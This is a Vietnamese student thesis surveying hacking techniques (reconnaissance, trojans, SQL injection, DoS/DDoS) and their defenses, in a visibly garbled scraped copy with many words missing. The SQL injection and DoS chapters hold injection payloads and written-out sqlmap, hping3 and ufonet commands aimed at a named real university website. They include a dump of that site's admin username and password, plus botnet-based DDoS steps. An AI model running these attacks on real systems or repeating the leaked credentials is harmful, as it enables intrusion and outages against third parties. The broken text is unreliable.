Đồ án tốt nghiệp khoa học an toàn thông tin

37 409 0
Đồ án tốt nghiệp khoa học an toàn thông tin

Đang tải... (xem toàn văn)

Tài liệu hạn chế xem trước, để xem đầy đủ mời bạn chọn Tải xuống

Thông tin tài liệu

Chắc chẳng cần nói thì mọi người cũng thấy đượ c sự phát triển của ngành công nghệ thông tin trong thời đại hiện nay tới mức nào. Mọi thứ trong xã hội đều cần ứng dụng công n gh ệ thông tin từ sản xuất, tới kinh doanh cho tới vui chơi, giải trí hay giáo dục, văn hóa nghệ thuật, . . . muốn phát triển đượ c đều cần có sự giúp đỡ của ngành công nghệ thông tin. Và thực tế cho thấy ngành nào có một hệ thống thông tin hiệu quả thì ngành đó rất phát triển. Chẳng những thế mà trong tốp 10 công ty lớn nhất thế giới có tới ba công ty làm về công nghệ thông tin đó là Apple, Microsoft, Go ogle. Và đặc biệt trong đó có công ty lớn nhất là Apple. Chính vì vậy mà công việc giữ gìn an ninh thông tin cho các c ông ty, chính phủ, cá nhân đặc biệt quan trọng. Nhất là trong khi su hướng phát triển hiện nay phần lớn các tổ chức, cá nhân đều muốn đưa các sản phẩm, ứng dụng, dịch vụ, thậm chí cả thông tin của mình nên internet vì tính tiện dụng của nó.

TRANG NHẬN XÉT CỦA GIẢNG VIÊN HƯỚNG DẪN NHẬN XÉT CỦA GIẢNG VIÊN HƯỚNG DẪN Mục đích nội dung đồ án: Kết đạt được: Ý thức làm việc sinh viên: Hà Nội, ngày tháng năm 2016 Giảng viên hướng dẫn (Ký ghi rõ họ tên) Mục lục Tổng quan an ninh thông tin 1.1 An ninh thông tin 1.1.1 Vậy an ninh thông tin ? 1.1.2 Các thuật ngữ an ninh thông tin 1.2 Hacker 1.2.1 Hacker ? 1.2.2 Các kỹ thuật công hacker 1.3 Quy trình công mục tiêu 1.3.1 Phân loại dạng công 1.3.2 Quy trình công 5 6 7 Tổng quan kỹ thuật 2.1 Kỹ thuật thu thập thông tin 2.2 Trojan Backdoor 2.3 Virus Worm 2.4 Sniffer 2.5 Social Engineering 2.6 Tấn công từ chối dịch vụ 2.7 Session Hijacking 2.8 SQL Injection 2.9 Buffer Overflow 2.10 Wireless Hacking 10 10 10 10 11 11 11 11 12 12 12 Đi sâu vào số kỹ thuật 3.1 Kỹ thuật thu thập thông tin 3.1.1 Quy trình thu thập thông tin 3.1.2 Một số công cụ thu thập thông tin điển hình 3.1.3 Cùng quậy với nmap 3.2 Trojan Và Backdoor 3.2.1 Phân biệt Trojan Backdoor 3.2.2 Overt Và Covert Channel 3.2.3 Các Trojan Và Backdoor đặc biệt 3.2.4 Thử nghiệm công 3.2.5 Các phương pháp phòng chống 3.3 SQL Injection 3.3.1 Vậy SQL Injection ? 3.3.2 Các lỗi thường gặp 3.3.3 Một số dạng công SQL Injection thông dụng 13 13 13 13 15 18 18 19 19 20 22 22 22 22 23 3.4 3.3.4 Phòng trống công SQL Injection Tấn công từ chối dịch vụ 3.4.1 Tấn công từ chối dịch vụ ? 3.4.2 Các giai đoạn công DDoS 3.4.3 Một số khái niệm cần biết 3.4.4 Các mô hình công DDoS 3.4.5 Phân loại kiểu công DDoS 3.4.6 Thử nghiệm công 3.4.7 Phòng chống công từ chối dịch vụ 27 27 27 28 28 28 30 32 34 Lời giới thiệu Chắc chẳng cần nói người thấy phát triển ngành công nghệ thông tin thời đại tới mức Mọi thứ xã hội cần ứng dụng công nghệ thông tin từ sản xuất, tới kinh doanh vui chơi, giải trí hay giáo dục, văn hóa nghệ thuật, muốn phát triển cần có giúp đỡ ngành công nghệ thông tin Và thực tế cho thấy ngành có hệ thống thông tin hiệu ngành phát triển Chẳng mà tốp 10 công ty lớn giới có tới ba công ty làm công nghệ thông tin Apple, Microsoft, Google Và đặc biệt có công ty lớn Apple Chính mà công việc giữ gìn an ninh thông tin cho công ty, phủ, cá nhân đặc biệt quan trọng Nhất su hướng phát triển phần lớn tổ chức, cá nhân muốn đưa sản phẩm, ứng dụng, dịch vụ, chí thông tin nên internet tính tiện dụng Chỉ cần kết nối internet người dùng truy cập ứng dung, dịch vụ(như toán online), hay liệu lúc, nơi, thời điểm với thiết bị điện thoại thông minh, hay máy tính cá nhân Vấn đề nảy sinh thân lúc đầu việc thiết kế mạng internet người ta không tính tới mức độ an toàn nó, hay thân ứng dụng, hệ thống thiết kế không tránh lỗ hổng bảo mật, nói hệ thống thông tin có lỗ hổng, việc tìm lỗ hổng vấn đề thời gian Thậm trí không tìm lỗ hổng ta công vào hệ thống Do có số nhóm người hay gọi hacker lợi dụng hiểu biết thân mạng máy tính, ngôn ngữ lập trình, phần cứng, sử dụng vào mục đích sai trái để công vào hệ thống thông tin, hay ứng dụng để nhằm mục đích đánh cắp liệu, phá hoai liệu, hệ thống nhằm chuộc lợi cho thân hay đơn giản thích thể thân Chính chưa lúc mà vấn đề an ninh thông tin lại quan tâm hiên Không mà sau Theo tổng kết an ninh mạng tập đoàn Bkav riêng VIỆT NAM 8.700 tỷ đồng thiệt hại virus máy tính gây người dùng Việt Nam năm 2015 Do thiếu hiểu biết việc quan tâm tới an ninh thông tin doanh nghiệp, cá nhân VIỆT NAM chưa trọng Chính đề tài trình bày vấn đề tổng quan an ninh thông tin Giúp cho người đọc hiểu được, kỹ thuật mà tin tặc hay sử dụng để công hệ thống, hay giai đoạn mà hacker thường làm để công Hơn đề tài có sâu vào số kỹ thuật có làm số ví dụ thực tế để dễ dàng hình dung Nhưng hạn chế mặt thời gian, thân người thực đề tài đặc biệt vấn đề liên quan đến An ninh thông tin an ninh thông tin vô rộng lớn, nên đề tài chưa thể đề cập đến nhiều vấn đề quan khác Vì đề tài tránh thiếu sót nên mong bạn đọc đóng góp ý kiến lượng thứ Lời cám ơn Trước hết em xin cám ơn toàn thể ban lãnh đạo viện Toán Tin Ứng Dụng trường đại học Bách Khoa Hà Nội, tạo điều kiện cho chúng em thực đề tài khoa học Đặc biệt em xin gửi lời cám ơn chân thành đến thầy “Vũ Thành Nam” giảng viên khoa toán tin trường đại học Bách Khoa Hà Nội tận tình hướng dẫn em thực đề tài này, bạn đọc dành thời gian quý báu thân đọc tài liệu Nhưng hạn chế nêu nên đề tài nhiều thiếu sót Một lần mong bạn đọc gửi ý kiến đóng góp vào địa email : doandoan171810@gmail.com Chương Tổng quan an ninh thông tin Sau chương có nhìn tổng quan an ninh thông tin, hiểu an ninh thông tin Các kỹ thuật, quy trình công mục tiêu mà giới hacker sử dụng 1.1 1.1.1 An ninh thông tin Vậy an ninh thông tin ? An ninh thông tin(information security) thực chất hiểu công việc mà phải luôn đảm bảo đặc tính cần có thông tin từ tác động bên hay bên ngoài, đặc tính 1) Confidentiality(C): Là đặc tính riêng tư thông tin Một mục tiêu quan trọng an ninh thông tin phải đảm bảo riêng tư cho liệu Điều có nghĩa người dùng truy vào thông tin phép truy cập Ví dụ số khu vực quan trọng phủ nhằm ngăn chặn người lạ xâm nhập với bảng cấm “không phận miễn vào” hình thức bảo vệ tính riêng tư Đối với liệu truyền để bảo vệ tính riêng tư chúng thường mã hóa hay sử dụng giao thức truyền thông an toàn SSH 2) Integrity(I): Là đặc tính toàn vẹn liệu, Mục tiêu an ninh thông tin bảo vệ tính toàn vẹn cho liệu Đảm bảo liệu truyền không bị thay đổi tác nhân khác, ví dụ email quan trọng gởi thường áp dụng thuật toán bảo vệ tính toàn vẹn message digest ngăn ngừa bị tác nhân thứ ba thay đổi cách chặn bắt thông điệp 3) Availability(A): Là tính khả dụng, sẳn sàng đáp ứng nhu cầu người dùng thông tin, dịch vụ Nghĩa liệu cần phải luôn đáp ứng nhu cầu người dùng Đối với nhà cung cấp dịch vụ, hay doanh nghiệp hệ thống bảo mật trở thành vô nghĩa thiếu đặc tính này.Ví dụ dịch vụ email doanh nghiệp phải luôn có khả đáp An ninh thông tin CHƯƠNG TỔNG QUAN VỀ AN NINH THÔNG TIN ứng nhu cầu gởi nhận email, cố mà dịch vụ email không diễn hệ thống bảo mật coi bị sụp đổ đánh khả đáp ứng nhu cầu người dùng 1.1.2 Các thuật ngữ an ninh thông tin Để sâu vào giới bảo mật cần phải hiểu thuật ngữ giới bảo mật - Threat: Là mối đe dọa an toàn thông tin bao gồm hacker, virus, cố máy tính hỏng phần cứng, phần mêm hay kể nguyên nhân thiên tai - Vulnerability: Là điểm yếu bảo mật hệ thống có khả bị công - Exploit: Là trình khai thác điểm yếu bảo mật để đánh cắp thông tin, tiến trình thực tác nhân bên hay bên hệ thống - Remote exploit: Là trình khai thác lỗ hổng bảo mật hệ từ xa máy tính khác hay internet - Local exploit: Là trình khai thác điểm yếu bảo mật hệ thống để tiến hành tăng quyền tài khoản hợp lệ đó, hay bẻ khóa mật ứng dụng - Target of evaluation: Chỉ mục tiêu có khả chứa lỗ hổng bảo mật có khả bị công Các mục tiêu máy chủ, máy trạm hay website - Attack: Thuật ngữ tiến trình công vào mục tiêu 1.2 1.2.1 Hacker Hacker ? Hacker hiểu người viết hay chỉnh sửa phần mềm, phần cứng máy tính bao gồm lập trình, quản trị bảo mật Những người hiểu rõ hoạt động hệ thống máy tính, mạng máy tính dùng kiến thức thân để làm thay đổi, chỉnh sửa với nhiều mục đích tốt xấu khác Dựa vào mục đích mà người ta chia hacker thành loại sau: 1) Black hat: Là người hay nhóm người sử dụng kỹ kiến thức để xâm nhập trái phép vào hệ thống, thực hành vi phá họai hay đánh cắp liệu Nhóm gọi ’Cracker’ hay ‘Attacker’ 2) White hat: Là người có kỹ hacker sử dụng chúng với mục đích tốt bảo mật thông tin, chống lại hacker mũ đen, kiểm thử bảo mật 1) Gray hat: Là người họat động hai lĩnh vực hacker mũ đen hacker mũ trắng An ninh thông tin 1.2.2 CHƯƠNG TỔNG QUAN VỀ AN NINH THÔNG TIN Các kỹ thuật công hacker Dựa vào lỗ hổng bảo mật thành phần hệ thống - Hệ điều hành: Khi cài đặt hệ thống mà cấu hình mặc định, nghĩa thay đổi, tùy biến để tăng mức độ bảo mật hệ thống Ngoài ra, việc không update vá hay cài đặt chương trình sữa lỗi bảo mật mồi ngon kẻ công - Ứng dụng: Các máy tính cài đặt nhiều ứng dụng, ứng dụng có lỗ hổng bảo mật nguy để hacker khai thác - Lỗi cấu hình: Việc cấu hình sai nguyên nhân khiến hệ thống bị công Do hiểu biết quản trị viên có vai trò đặc biệt tới mức độ bảo mật hệ thống Từ hacker công hệ thống nhờ kỹ thuật trojan, backdoor, sniffer, rootkit, Buffer Overflow, SQL Injection, DoS, DDoS, 1.3 1.3.1 Quy trình công mục tiêu Phân loại dạng công Các dạng công phân loại dựa trạng thái hoạt động hay vị trí địa lý Phân loại theo trạng thái hoạt động - trạng thái bị động(passvie): Là công mà không tương tác trực tiếp vào hệ thống hay đường truyền mà âm thầm thu thập thông tin Nghe sniffing dạng công loại này, hacker nghe liệu gọi sniffer thường làm tổn hại tới đặc tính Confidentiality thông tin Dạng công thường khó bị phát - Trạng thái chủ đông(active): Là công tương tác trực tiếp vào hệ thống hay đường truyền thường làm tổn hại tới đặc tính Availability, Integrity Ví dụ DDoS, scan port công thuộc dạng Phân loại theo vị trí địa lý - Từ bên trong(inside) hệ thống: Những kẻ công inside insider thường nhân viên công ty, hay người có mối quan hệ trực tiếp tới tổ chức hậu công nguy hiểm Theo số thống kê cho thấy 80% tác nhân gây mát thông tin thành viên bên hệ thống - Từ bên ngoài(outside) hệ thống: Những thành viên bên lại có mối nguy hiểm khác thành viên bên họ thường đông đảo hơn, có trình độ kỹ thuật cao mục tiêu công họ thường nhắm vào hệ thống bảo vệ hay có giao tiếp với môi trường công cộng máy chủ sở liệu, trang web, An ninh thông tin 1.3.2 CHƯƠNG TỔNG QUAN VỀ AN NINH THÔNG TIN Quy trình công Để công cách hiệu không để lại dấu vết hacker thường tuân theo giai đoạn định sau Reconnaissance: Là giai đoạn thu thập thông tin, liệu mục tiêu có hai hình thức thực hiên công việc là: - Passive reconnaissance: Là qua trình thu thập thông tin mục tiêu theo hình thức bị động Thường thực công cụ google search, yahoo, facebook hay sở liệu Whois Kiểu công sniffing ví dụ điển hình cho passive reconnaissance, với phương pháp hacker thu thập nhiều thông tin giá trị dãy địa IP, tên miền tổ chức, máy chủ ẩn danh hay dịch vụ hoạt động mạng - Active reconnaissance: Là trình thu thập thông tin theo hình thức chủ động Hacker tác động trực tiếp nên đối tượng để thu gói liệu phản hồi Ví dụ kẻ công dò quét mạng để xác định máy hoạt động hay dịch vụ chay máy Một công cụ thường dùng Nessus, Supperscan, Scanning: Là trình thuộc giai đoạn reconnaissance Hacker tiến hành scanning chương trình quét lỗi hệ thống, quét địa ip hay cổng mở namp, Angry Ip Scan, Gaining access: Là trình xâm nhập mục tiêu trình khai thác công thành công Lúc hacker xâm nhập vào hệ thống đánh cắp thông tin, phá hủy liệu, cài đặt mã độc leo thang quyền Để thâm nhập thành công hacker cần có thông tin từ giai đoạn reconnaissance, scanning để đưa phương án công hợp lý khai thác lỗi tràn đệm (buffer overflow), hay chiếm quyền sử dụng phiên làm việc người dùng (session hijacking), An ninh thông tin CHƯƠNG TỔNG QUAN VỀ AN NINH THÔNG TIN Maintaining access: Là trình cài đặt chương trình dán điệp để trì kiểm soát, nghe thông tin người dùng, mở cổng hậu để quay lại lần sau, sau thâm nhập thành công Covering track: Là trình xóa dấu vết để tránh bị phát Ví dụ sóa tập tin nhật ký ứng dưng, hệ thống xóa ẩn tiến trình nguy hiểm An ninh thông tin CHƯƠNG ĐI SÂU VÀO MỘT SỐ KỸ THUẬT Bây chiếm quyền sử dụng chương trình cmd, máy nạn nhân ta làm nhiều điều từ chương trình 3.2.5 Các phương pháp phòng chống Cách phòng chống đặc biệt hiệu sử dụng phần mềm diệt virus Avast, Kaspersky, Nob32 để phat sóa bỏ chúng Dùng công cụ giám sát dò tìm port Fport, TCP view, PrcView, Phòng chống kiểm tra tính toàn vẹn tập tin Đó windows có tính Windows File Protection giúp ngăn ngừa việc thay tập tin bảo vệ 3.3 SQL Injection Albert Gonzalez - Trùm hacker SQL Injection Trong khoảng thời gian từ năm 2005 đến năm 2007, Albert Gonzalez đánh cắp 170.000.000 thẻ tín dụng khắp giới Vụ án vụ án lớn lịch sử tội phạm hacker mức độ thiệt hại gây (Số tiền bị đánh cắp ước tính ngân sách quốc gia phát triển) Như SQL injection thiệt hại gây lại nghiêm trọng 3.3.1 Vậy SQL Injection ? SQL Injection: kỹ thuật, lợi dụng lỗ hổng việc kiểm tra liệu đầu vào ứng dụng web, thông báo lỗi hệ quản trị sở liệu trả về, để inject(tiêm vào) câu lệnh SQL thực thi chúng bất hợp pháp Thực thao tác delete, insert, update, sở liệu ứng dụng Lỗi thường xảy ứng dụng web có liệu quản lý hệ quản trị sở liệu SQL Server, MySQL, Oracle, 3.3.2 Các lỗi thường gặp Không kiểm tra ký tự thoát truy vấn Đây dạng lỗi SQL Injection xảy thiếu đoạn mã kiểm tra liệu đầu vào câu truy vấn SQL Ví dụ câu truy vấn sau dùng để trả ghi từ bảng users str = "SELECT * FROM users WHERE name = ’" + userName + "’;" 22 An ninh thông tin CHƯƠNG ĐI SÂU VÀO MỘT SỐ KỸ THUẬT Tuy nhiên, biến "userName" nhập theo cách đó, người dùng ác ý câu truy vấn trở thành SELECT * FROM users WHERE name = ’a’ OR ’t’=’t’; Nếu đoạn mã sử dụng cho vấn đề xác thực kết thực thi Xử lý không kiểu Thường xảy lập trình viên hay người dùng định nghĩa liệu đầu vào không rõ ràng hay thiếu bước lọc liệu đầu vào Ví dụ câu lệnh sau với mục đích lấy ghi tương ứng với id nhập vào: statement := "SELECT * FROM data WHERE id = " + variable + ";" Dễ thấy dạng liệu id trường số, ta nhập vào biến variable = 1;DROP TABLE users câu truy vấn thực thi nhưu sau SELECT * FROM DATA WHERE id=1;DROP TABLE users; bảng users bị xóa Blind SQL Injection SQL Injection dạng dạng lỗi tồn ứng dụng web hậu chúng lại không hiển thị trực quan cho kẻ công Nó gây sai khác hiển thị nội dung trang chứa lỗi bảo mật này, hậu công SQL injection dạng khiến cho lập trình viên hay người dùng phải nhiều thời gian để phục hồi xác bit liệu Những kẻ công sử dụng số công cụ để dò tìm lỗi dạng công với thông tin thiết lập sẵn sqlmap 3.3.3 Một số dạng công SQL Injection thông dụng Vượt kiểm tra lúc đăng nhập Với dạng này, hacker vượt qua trang đăng nhập nhờ vào việc khai thác lỗi dùng câu truy vấn SQL thao tác sở liệu ứng dụng web Ví dụ với đoạn mã sau với mục địch kiểm tra đăng nhập "SELECT * FROM users WHERE name = ’" + userName + "’ AND Pass=’"+ Pass +"’;" nhập userName là: Bob’ or 1=1 câu lệnh thực thi sau "SELECT * FROM users WHERE name = ’Bob’ or 1=1 ’ AND Pass=’any’;" Mà ngông ngữ SQL đằng sau dấu - - hiểu comment không thực thi Do hacker truy cập trái phép Sử dụng câu lệnh SELECT Để thực hiệt tốt kiểu công này, hacker phải đọc hiểu thông báo lỗi từ hệ thống Sau dò tìm điểm yếu khởi đầu cho việc công Ví dụ, trang tìm kiếm Các trang cho phép người dùng nhập vào thông tin tìm kiếm Họ, Tên, 23 An ninh thông tin CHƯƠNG ĐI SÂU VÀO MỘT SỐ KỸ THUẬT Nếu nhập vào trường tác giả : ’ DROP TABLE T_AUTHORS -lập tức bảng T_AUTHORS bị xóa Sử dụng cấu lệnh INSERT Thông thường ta đăng ký tài khoản ứng dụng web Sau đăng ký thành công người dùng xem chỉnh sử thông tin cảu Ví dụ câu lệnh INSERT có cú pháp dạng INSERT INTO TableName VALUES(’Value One’,’Value Two’,’Value Three’) Từ đoạn mã xây dựng câu lênh SQL có dạng: Nếu trường thứ ta nhập là: ’ + (SELECT TOP FieldName FROM TableName) + ’ Lúc yêu cầu truy vấn trở thành INSERT INTO TableName VALUES(’ ’ + (SELECT TOP FieldName FROM TableName) + ’ ’, ’abc’, ’def’) Khi hacker tự động thực thêm lệnh SELECT TOP FieldName FROM TableName Thử nghiệm công Có nhiều công cụ phục vụ cho việc công SQL Injection phải nói tới công cụ manh mẽ sqlmap Là công cụ chuyên khai thác lỗ hổng sở liệu, nói sqlmap tốt với việc hỗ trợ nhiều tính mạnh mẽ Tool tích hợp sẵn hệ điều hành kali linux 2.0, với Windows muốn sử dụng ta phải cài đặt thêm python Target: http://daotaonlyt.edu.vn/ Tool: sqlmap cài đặt hệ điều hành kali linux, Web Admin Finder Bước 1: Kiểm tra xem website có lỗi SQL Injection không, ta thêm dấu ’ vào sau địa web http://daotaonlyt.edu.vn/index.php?id= có thông báo lỗi 24 An ninh thông tin CHƯƠNG ĐI SÂU VÀO MỘT SỐ KỸ THUẬT thật may mắn ta khai thác Bước 2: công câu lệnh: sqlmap –u http://daotaonlyt.edu.vn/?index.php?id=1 –dbs lệnh cho ta xem database website Và thấy có database Chúng ta tiếp túc kiểm tra bảng có database daotaonlyt_dhyd qua lệnh: sqlmap –u http://daotaonlyt.edu.vn/?index.php?id=1 –D daotaonlyt_dhyd –table Kết thu Tiếp theo xem xem bảng thành viên có thông tin admin thông qua lệnh: sqlmap –u http://daotaonlyt.edu.vn/?index.php?id=1 25 An ninh thông tin CHƯƠNG ĐI SÂU VÀO MỘT SỐ KỸ THUẬT –D daotaonlyt_dhyd –T thongtin –columns Kết thu trường liệu sau Tiếp theo cho xuât kết username password qua lệnh: sqlmap –u http://daotaonlyt.edu.vn/?index.php?id=1 –D daotaonlyt_dhyd –T –C username,password –dump Kết thu được: Bước 3: thu tài khoản admin có username: ttdtnlyt, pass:nlyt_123 sẽ tìm tới trang quản trị qua công cụ Web Admin Finder để tiến hành đăng nhập thành công Kết thu sau 26 An ninh thông tin 3.3.4 CHƯƠNG ĐI SÂU VÀO MỘT SỐ KỸ THUẬT Phòng trống công SQL Injection Để phòng trống SQL injection hiệu cần: Gán quyền thích hợp cho người dùng kết nối tới sở liệu áp dụng mật mạnh cho tài khoản SA Hacker thường chuẩn đoán lỗi dựa thông báo trả về, nên cần phải hạn chế thông báo lỗi Các ký tự hacker thường dùng dấu nháy đơn ’, hay lợi dụng tham số truyền vào cần phải kiểm tra dữ, lọc liệu đầu vào chặt chẽ Sử dụng plug-in hỗ trợ phòng chống SQL Injection, hay chương trình phát lỗi Web Acunetix Scanner, để sớm phát khắc phục 3.4 Tấn công từ chối dịch vụ Một kỹ thuật mà làm cho giới quản trị hệ thống phải đau đầu Chính kỹ thuận công từ chối dịch vụ, việc phòng chống dừng lại việc khắc phục hậu Ngày 7/3/2000, yahoo.com phải ngưng phục vụ hàng trăm triệu user toàn giới nhiều liền Vài sau, Yahoo tìm nguyên nhân gây nên tình trạng này, họ phải gánh chịu đợt công DDoS với quy mô vài ngàn máy tính liên tục gửi hàng triệu request đến server dịch vụ làm server phục vụ user thông thường khác 3.4.1 Tấn công từ chối dịch vụ ? Tấn công từ chối dịch vụ, kỹ thuật nhằm mục đích ngăn cản truy nhập hợp lệ người dùng Vào website, dịch vụ trực tuyến Tấn công từ chối dịch vụ có hai kiểu Distributed Denial of Service(DDoS) Denial of Service(DoS) Thực chất việc công DoS nguồn gây ra, công DDoS nghiều nguồn gây Do phát công DoS ta cần ngắt kết nối với nguồn đó, DDoS việc phòng chống khó nguồn công phát tán từ nhiều nơi, nên khó chặn hết dó chình bày kỹ thuật DDoS Vì thân DoS 27 An ninh thông tin CHƯƠNG ĐI SÂU VÀO MỘT SỐ KỸ THUẬT DDoS chung kỹ thuật công, khác số lượng tham gia vào việc công 3.4.2 Các giai đoạn công DDoS Tấn công DDoS thường qua giai đoạn Giai đoạn chuẩn bị: Để công hiệu việc đâu tiên mà hacker thường làm là, chuẩn bị công cụ để phục vụ công, download internet tự viết, công cụ có sẵn TrinOO, Tribe Flood Network (TFN), UFONet, dùng kỹ thuật hack khác để nắm chọn quyền số host mạng, nhiều tốt sau tiếp tục cài đặt phần mềm cần thiết host này, để điều khiển toàn attack-netword Xác định mục tiều thời điểm: Sau xác đinh mục tiêu lần cuối hacker điểu chỉnh attack-netword chuyển hướng công vào mục tiêu Thiệt hại công gây phụ thuộc vào số lượng máy công, thời điểm công có thích hợp hay không Phát động công sóa dấu vết: Đúng thời điểm định, hacker phát động công từ máy mình, lệnh công qua nhiều cấp mói đến host thực công Toàn attack-network, vắt cạn lực đáp ứng hệ thống mục tiêu liên tục, ngăn chặn không cho phục vụ user khác Kết thúc công, hacker tiến hành xóa dấu vết truy ngược đến mình, việc đòi hỏi trình độ khác cao không tuyệt đối cần thiết máy công thực chất máy hacker 3.4.3 Một số khái niệm cần biết - Client: software sở điều khiển hoạt động attack-network - Handler: Thành phần trung gian gữa Client Agent - Agent: Thành phần software thực công mục tiêu, nhận điều khiển từ Client thông qua Handler - Internet Relay Chat (IRC): Là hệ thống online chat multiuser, IRC cho phép user kết nối multipoint đến nhiều user khác chát thời gian thực Kiến trúc cũ IRC network bao gồm IRC server khắp internet, giao tiếp với nhiều kênh (channel) IRC network cho phép user tạo ba loạIRC network cho phép user tạo ba loại channel: public, private serect.i channel: public, private serect 3.4.4 Các mô hình công DDoS Mô hình Agent – Handler Ở mô hình attacker từ Client giao tiếp với Handler để xác định số lượng Agent online, điều chỉnh thời điểm công cập nhật Agent Tùy theo cách attacker cấu hình attack- network, mà Agent chịu quản lý hay nhiều Handler Thông thường kẻ công đặt Handler software Router hay 28 An ninh thông tin CHƯƠNG ĐI SÂU VÀO MỘT SỐ KỸ THUẬT server có lưu thông nhiều Việc làm cho giao tiếp Client, handler Agent khó phát Các giao tiếp thông thường xảy protocol TCP, UDP hay ICMP Mô hình IRC – Based IRC – Based network đóng vai trò như Agent–Handler network sử dụng kênh giao tiếp IRC làm phương tiện giao tiếp gữa Client Agent Mô hình có nhiều lợi như: 29 An ninh thông tin CHƯƠNG ĐI SÂU VÀO MỘT SỐ KỸ THUẬT + Các giao tiếp dạng message làm cho việc phát chúng vô khó khăn + IRC traffic di chuyển mạng số lượng lớn mà không bị nghi ngờ + Không cần trì danh sách Agent, tin tặc cần logon vào IRC server nhận trạng thái Agent channel gửi + IRC môi trường chia sẻ file phát tán mã độc 3.4.5 Phân loại kiểu công DDoS Ta phân loại kiểu công DDoS dựa mục đích công Làm cạn kiệt băng thông, hay tài nguyên hệ thống, sơ đồ mô tả kiểu công DDoS Tấn công theo kiểu làm cạn kiệt băng thông Là kỹ thuật với mục đích làm tràn ngập mạng mục tiêu với lưu lượng không cần thiết Làm cho hệ băng thông không đủ để phục vụ cho yêu cầu hợp lệ, gửi tới hệ thống Và kỹ thuật chia làm hai loại là: Flood attack: Kỹ thuật Agent gửi lưu lượng lớn đến mục tiêu làm cho mục tiêu hết khả băng thông Một kỹ thuật kinh điển dạng Đó kỹ thuật công UDP Flood Attack dựa điểm yếu giao thức mạng UDP gửi liệu bên gửi liên tục gửi liệu, mà không cần quan tâm đến bên nhận có đáp ứng không Hacker tạo lượng lớn UDP packet dược gửi tới mục tiêu Và mục tiêu phải căng để sử lý yêu cầu đến ngưỡng tới hạn hệ thống, hệ thống từ chối yêu cầu hợp lệ, nhiều dạng công khác mà nói hết 30 An ninh thông tin CHƯƠNG ĐI SÂU VÀO MỘT SỐ KỸ THUẬT Amplification Attack: Kỹ thuật lợi dụng chức hỗ trợ địa quảng bá(broadcast) thiết bị router, nhằm khếch đại hồi chuyển công Chức cho phép bên gửi cần gửi gói tin đến địa broadcast, router gửi gói tin tới host mạng Smurf attack: Là kỹ thuật điển hình dạng này, gói tin mà hacker gửi tới địa quảng bá, giả mạo địa nguồn địa nạn nhân Thông thường packet dùng ICMP ECHO REQUEST, máy mạng yêu cầu bên nhận phải trả lời ICMP ECHO REPLY đến mục tiêu, làm cho băng thông bị cạn kiệt số lượng lớn Tấn công theo kiểu làm cạn kiệt tài nguyên hệ thống: Là kỹ thuật mà hacker gửi packet dùng protocol sai chức thiết kế, hay packet với mục đích làm nghẽn tài nguyên mạng làm cho tài nguyên không phục vụ user khác Có hai dạng công kiểu Protocol Exploit Attack: Là kỹ thuật khai thác lỗ hổng giao thức mạng TCP SYS Attack: Là kỹ thuật điển hình dạng công này, khai thác điểm yếu chế bắt tay ba bước giao thức mạng TCP Nếu bên gửi gửi SYN REQUEST packet, mục tiêu nhận trả lại SYN/ACK REPLY packet thân SYN REQUEST packet giả mạo địa IP nguồn thật Làm cho SYN/ACK REPLY packet gửi đến địa thật Làm cho mục tiêu phải dành tài nguyên hệ thống để chờ sử lý gói tin, mà không phản hồi lại hết thời gian timeout Nếu SYN packet gửi đến với số lượng lớn dồn dập, làm cho hệ thống nạn nhân hết tài nguyên Malformed Packet Attack: Là kỹ thuật công mà gửi packet có cấu trúc sai IP address attack: Sử dụng packet có địa gởi nhận giống làm cho hệ điều hành nạn nhân không xử lý bị treo 31 An ninh thông tin 3.4.6 CHƯƠNG ĐI SÂU VÀO MỘT SỐ KỸ THUẬT Thử nghiệm công Thử nghiệm công DoS - Target: 192.168.1.46 | win7 x64 ultimate - Attacker: 192.168.1.100| kali linux - Tool: Hping3 công cụ thường tích hợp sẵn hệ điều hành kali linux Chuyên phân tích tạo gói tin cho giao thức TCP/IP Đầu tiên thực kỹ thuật Land Attack tương tự SYN flood, kẻ công dùng địa mục tiêu làm địa nguồn đẩy mục tiêu vào vòng lặp vô tận Từ máy công kali ta remote vào máy nạn nhân qua lệnh: rdesktop 192.168.1.46 Kết ta remote thành công Tấn công máy nạn nhân qua lệnh sau: hping3 192.168.1.46 –a 192.168.1.46 -1 –S -p 3389 –i u1 Tùy chọn -a dùng để giả mạo địa chỉ, -1 chọn ICMP mode, -S bật cờ SYN, -p số hiệu cổng, Cổng 3389 sử dụng cho Windows remote desktop chạy cổng này, -1 tốc độ, u1 nhanh Kết thu ta remote vào máy nạn nhân 32 An ninh thông tin CHƯƠNG ĐI SÂU VÀO MỘT SỐ KỸ THUẬT Thử nghiệm công DDoS - Target: http://daotaonlyt.edu.vn/ - Attacker: 192.168.1.17 | kali linux - Tool: ufonet công cụ để kiểm thử công DDoS, thiết lập, quản lý mạng botnet công mục tiêu vào tầng ứng dụng qua giao thức HTTP Có thể download https://ufonet.03c8.net/ Tìm kiếm zombies: Ufonet khai thác công cụ tìm kiếm google, ping, yahoo, để tìm site có điểm yếu bảo mật chuỗi truy vấn Chúng ta tìm kiếm zombies qua nhiều công cụ tìm kiếm mà ufonet hỗ trợ qua lệnh: /ufonet -s ’url proxy.php =?’ sa Chúng ta kiểm tra zombies kiểm soát qua lệnh /ufonet -t zombies.txt mở trực tiếp file zombies.txt để kiểm tra hay bật giao diện đồ họa công cụ để kiểm tra Ví dụ ta bật giao diện đồ họa qua lệnh: /ufonet gui Kết thu là: 33 An ninh thông tin CHƯƠNG ĐI SÂU VÀO MỘT SỐ KỸ THUẬT Tiếp theo tiến hành DDoS mục tiêu qua lênh làm việc với hình đồ họa: /ufonet -a http://target.com -r 10 Hãy xem giao diện đồ họa điều xảy ra: Chúng ta thấy zombies ta công vào mục tiêu 3.4.7 Phòng chống công từ chối dịch vụ Việc phòng chống công DoS không phức tạp Ta cần ngắt kết nối phát có tượng công, che dấu, tắt cổng dịch vụ không cần thiết, cấu hình tường lửa chống scanning hay lọc gói tin không hợp lệ, 34 An ninh thông tin CHƯƠNG ĐI SÂU VÀO MỘT SỐ KỸ THUẬT Ngược lại việc phòng trống DDoS phức tạp, yêu cầu người quản tri phải có kiến thức sâu Việc phòng chống DDoS thường có giai đoạn là: Giai đoạn ngăn ngừa: Luôn tìm phát vô hiệu hóa, giảm thiểu Agent, Handler Đối đầu: Khi bị công ngăn chặn công, làm suy giảm dừng công, chuyển hướng công, phối hợp với ISP để khoanh vùng ngăn chặn mạng botnet Kết thúc công: Cần thu thập chứng cứ, chặn số địa nghi ngờ rút kinh nghiệm Kết luận Trên toàn nội dung đề tài tìm hiểu thứ vấn đề an ninh thông tin Chương 1, tìm hiểu 